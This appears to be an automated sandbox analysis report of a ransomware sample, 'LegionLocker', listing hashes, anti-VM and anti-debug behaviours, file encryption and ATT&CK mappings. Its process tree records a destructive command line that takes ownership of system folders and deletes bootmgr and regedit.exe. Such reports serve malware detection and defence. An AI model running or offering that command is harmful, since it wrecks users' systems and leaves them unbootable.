Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-11-2024 12:23
Behavioral task
behavioral1
Sample
Ransomware LegionLocker.exe
Resource
win7-20240708-en
General
-
Target
Ransomware LegionLocker.exe
-
Size
3.1MB
-
MD5
6a85d0ba4d1db63d390b7a071d60e0ef
-
SHA1
79a32ee067e19b43bc3f29fde3a3ff95986f8e2e
-
SHA256
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
-
SHA512
16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce
-
SSDEEP
49152:uZik4UvxXDFSuvXKWC9BKtKkd1UOe65qeVyODIaihosmrcvCM97Wd84T3D:YGuDppmT+Be6bymIhoBcaY6d84jD
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\HOW-TO-DECRYPT.TXT
http://mail2tor2zyjdctd.onion/
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
Ransomware LegionLocker.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Ransomware LegionLocker.exe -
Renames multiple (465) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 5 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 1748 takeown.exe 4132 icacls.exe 4864 takeown.exe 704 icacls.exe 3680 takeown.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Ransomware LegionLocker.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Ransomware LegionLocker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Ransomware LegionLocker.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Ransomware LegionLocker.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Ransomware LegionLocker.exe -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
icacls.exetakeown.exetakeown.exeicacls.exetakeown.exepid process 704 icacls.exe 3680 takeown.exe 1748 takeown.exe 4132 icacls.exe 4864 takeown.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/3928-11-0x0000000000720000-0x0000000000F50000-memory.dmp themida behavioral2/memory/3928-12-0x0000000000720000-0x0000000000F50000-memory.dmp themida -
Processes:
Ransomware LegionLocker.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ransomware LegionLocker.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Ransomware LegionLocker.exepid process 3928 Ransomware LegionLocker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeRansomware LegionLocker.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ransomware LegionLocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
Ransomware LegionLocker.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 3928 Ransomware LegionLocker.exe Token: SeDebugPrivilege 3928 Ransomware LegionLocker.exe Token: SeTakeOwnershipPrivilege 1748 takeown.exe Token: SeTakeOwnershipPrivilege 4864 takeown.exe Token: SeTakeOwnershipPrivilege 3680 takeown.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
Ransomware LegionLocker.execmd.exedescription pid process target process PID 3928 wrote to memory of 2344 3928 Ransomware LegionLocker.exe cmd.exe PID 3928 wrote to memory of 2344 3928 Ransomware LegionLocker.exe cmd.exe PID 3928 wrote to memory of 2344 3928 Ransomware LegionLocker.exe cmd.exe PID 2344 wrote to memory of 1748 2344 cmd.exe takeown.exe PID 2344 wrote to memory of 1748 2344 cmd.exe takeown.exe PID 2344 wrote to memory of 1748 2344 cmd.exe takeown.exe PID 2344 wrote to memory of 4132 2344 cmd.exe icacls.exe PID 2344 wrote to memory of 4132 2344 cmd.exe icacls.exe PID 2344 wrote to memory of 4132 2344 cmd.exe icacls.exe PID 2344 wrote to memory of 4864 2344 cmd.exe takeown.exe PID 2344 wrote to memory of 4864 2344 cmd.exe takeown.exe PID 2344 wrote to memory of 4864 2344 cmd.exe takeown.exe PID 2344 wrote to memory of 704 2344 cmd.exe icacls.exe PID 2344 wrote to memory of 704 2344 cmd.exe icacls.exe PID 2344 wrote to memory of 704 2344 cmd.exe icacls.exe PID 2344 wrote to memory of 3680 2344 cmd.exe takeown.exe PID 2344 wrote to memory of 3680 2344 cmd.exe takeown.exe PID 2344 wrote to memory of 3680 2344 cmd.exe takeown.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1748 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4132 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4864 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:704 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3680
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f2bbb85d6112bd7360a4ddbc23ea9a8b
SHA1683eb7b2b0a5904337f204f71d25c02b9cc5daba
SHA256be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2
SHA512a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
Filesize16B
MD52caa6f3c95f6ec6bba5b54344938efa0
SHA12d5637f50e858fbaaeec7853d944dd3c3e91ec39
SHA25616ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6
SHA5124141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00
-
Filesize
332KB
MD589b6590fcb9080db24875fa671b516ca
SHA120e472ccdba84d504e087418e703073f44c4f2d9
SHA256d883bdee08b17e451d3be046fd7cd7b9c816c37f72fa123ca1c13c81e9fcd5ac
SHA5123eea6d9796596d9d491b2fa1de794c33bda6447e11c611d769c32da6bd62f25d4b7b13748e70a601ae70f45eb36463d7080e16fcf80571e693109d9395345ee0
-
C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat
Filesize8KB
MD55090259c42fc6263bc00e952846280e8
SHA19bf53e854027c9dec3b25ff1164e88872c71f66e
SHA256a05288aa086504a20d2a3177854f8eb158778756ebc24dcfca266c52fa8d5a17
SHA5128b44fb8fade639c6b4d4b1f8747a8176652700a16b38e43f5f74403c2af0882fb6095986f8e4d94f3d5a242e8d49ed99a03361c01469c8c6a7bf7a7c3527ec7f